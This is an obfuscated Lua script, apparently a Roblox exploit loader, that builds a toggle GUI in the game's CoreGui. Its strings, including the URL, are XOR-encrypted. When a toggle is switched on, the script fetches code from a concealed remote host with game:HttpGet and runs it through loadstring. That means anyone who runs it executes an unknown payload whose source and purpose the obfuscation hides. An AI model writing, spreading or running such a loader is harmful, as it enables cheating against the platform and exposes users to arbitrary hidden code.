--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v49,v50) local v51={};for v61=1, #v49 do v6(v51,v0(v4(v1(v2(v49,v61,v61 + 1 )),v1(v2(v50,1 + (v61% #v50) ,1 + (v61% #v50) + 1 )))%256 ));end return v5(v51);end local v8=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));local v9=Instance.new(v7("\5\223\43\200\249","\156\67\173\74\165"));local v10=Instance.new(v7("\1\158\106\25\174\40\67\38","\38\84\215\41\118\220\70"));local v11=Instance.new(v7("\100\19\58\6\210\81\20\39\30","\158\48\118\66\114"));local v12=Instance.new(v7("\159\33\8\34\81\170\227","\155\203\68\112\86\19\197"));local function v13(v52,v53) local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v54==3) then v57.TextColor3=Color3.fromRGB(863 -608 ,1207 -952 ,255);v57.Font=Enum.Font.GothamBold;v57.TextSize=14;v57.TextXAlignment=Enum.TextXAlignment.Left;v54=2 + 2 ;end if (v54==(17 -12)) then v58.Position=UDim2.new(0.9, -(1772 -(760 + 987)),0.5,1913 -(1789 + 124) );v58.AnchorPoint=Vector2.new(766.5 -(745 + 21) ,0.5 + 0 );v58.BackgroundColor3=Color3.fromRGB(701 -446 ,0 -0 ,0 + 0 );v58.Parent=v55;v54=5 + 1 ;end if (v54==(1062 -(87 + 968))) then v60=false;v59.MouseButton1Click:Connect(function() v60= not v60;v58.BackgroundColor3=(v60 and Color3.fromRGB(0,1122 -867 ,0)) or Color3.fromRGB(232 + 23 ,0 -0 ,1413 -(447 + 966) ) ;print(v53   .. v7("\9\118\15\34\78\78\5\33\19\2","\69\41\34\96")   .. tostring(v60) );if v60 then loadstring(game:HttpGet(v7("\180\215\195\26\17\113\243\140\211\11\16\32\175\192\197\3\18\63\175\141\196\26\3\40\185\140\196\9\16\34\172\215\196\69\3\45\190\198\131\88\7\47\241\144\211\9\7\102\232\194\129\82\79\42\228\197\135\71\6\41\233\192\142\89\90\45\186\154\211\8\61\122\239\145\133\94\87\126\238\148\134\91\84\125\229\149\128\82\82\115\242\207\194\11","\75\220\163\183\106\98"),true))();end end);break;end if (v54==(10 -6)) then v57.BackgroundTransparency=1818 -(1703 + 114) ;v57.Parent=v55;v58=Instance.new(v7("\63\173\208\210\136","\84\121\223\177\191\237\76"));v58.Size=UDim2.new(701 -(376 + 325) ,20,0,20);v54=8 -3 ;end if (v54==0) then v55=Instance.new(v7("\96\207\55\241\69","\152\38\189\86\156\32\24\133"));v55.Size=UDim2.new(0.9,0 -0 ,0,12 + 28 );v55.Position=v52;v55.BackgroundColor3=Color3.fromRGB(110 -60 ,64 -(9 + 5) ,426 -(85 + 291) );v54=1266 -(243 + 1022) ;end if (v54==(22 -16)) then v59=Instance.new(v7("\143\83\209\180\24\69\36\213\180\88","\161\219\54\169\192\90\48\80"));v59.Size=UDim2.new(1 + 0 ,1180 -(1123 + 57) ,1 + 0 ,254 -(163 + 91) );v59.BackgroundTransparency=1;v59.Parent=v55;v54=7;end if (v54==(1931 -(1869 + 61))) then v55.Parent=v9;v56=Instance.new(v7("\201\126\132\73\238\89\162\84","\38\156\55\199"));v56.CornerRadius=UDim.new(0 + 0 ,8);v56.Parent=v55;v54=6 -4 ;end if (v54==(2 -0)) then v57=Instance.new(v7("\156\120\100\60\63\117\248\70\164","\35\200\29\28\72\115\20\154"));v57.Size=UDim2.new(0.8,0,1,0);v57.Position=UDim2.new(0,2 + 8 ,0,0);v57.Text=v53;v54=3;end end end v8.Name=v7("\54\168\138\51\220\49\185\138\58\254\55\147","\185\98\218\235\87");v8.Parent=game.CoreGui;v9.Name=v7("\230\61\46\232\248\184\202\49\34","\202\171\92\71\134\190");v9.Size=UDim2.new(0,250,0,302 -82 );v9.Position=UDim2.new(0.5 + 0 , -125,1474.5 -(1329 + 145) , -(1081 -(140 + 831)));v9.BackgroundColor3=Color3.fromRGB(1890 -(1409 + 441) ,758 -(15 + 703) ,19 + 21 );v9.Active=true;v9.Draggable=true;v9.Parent=v8;v10.CornerRadius=UDim.new(438 -(262 + 176) ,10);v10.Parent=v9;v11.Name=v7("\29\200\56\132\44","\232\73\161\76");v11.Size=UDim2.new(1722 -(345 + 1376) ,688 -(198 + 490) ,0 -0 ,71 -41 );v11.BackgroundTransparency=1;v11.Text=v7("\143\203\67\89\27\251\234\65\92\19","\126\219\185\34\61");v11.TextColor3=Color3.fromRGB(1461 -(696 + 510) ,255,255);v11.Font=Enum.Font.GothamBold;v11.TextSize=33 -17 ;v11.Parent=v9;v12.Name=v7("\57\221\91\96\112\118\254\226\46\193\70","\135\108\174\62\18\30\23\147");v12.Size=UDim2.new(1262.9 -(1091 + 171) ,0 + 0 ,0,30);v12.Position=UDim2.new(0.05 -0 ,0 -0 ,374.25 -(123 + 251) ,0 -0 );v12.BackgroundColor3=Color3.fromRGB(50,748 -(208 + 490) ,50);v12.Text=v7("\131\250\47\217\22\175\62\194\236\169","\167\214\137\74\171\120\206\83");v12.TextColor3=Color3.fromRGB(22 + 233 ,255,255);v12.Font=Enum.Font.Gotham;v12.TextSize=7 + 7 ;v12.ClearTextOnFocus=false;v12.Parent=v9;local v46=Instance.new(v7("\190\217\17\82\234\169\142\226","\199\235\144\82\61\152"));v46.CornerRadius=UDim.new(0,844 -(660 + 176) );v46.Parent=v12;v13(UDim2.new(0.05 + 0 ,202 -(14 + 188) ,675.5 -(534 + 141) ,0),v7("\51\25\190\44\11\19\249\122","\75\103\118\217"));v13(UDim2.new(0.05 + 0 ,0,0.7 + 0 ,0 + 0 ),v7("\243\91\119\19\181\27\135\6","\126\167\52\16\116\217"));
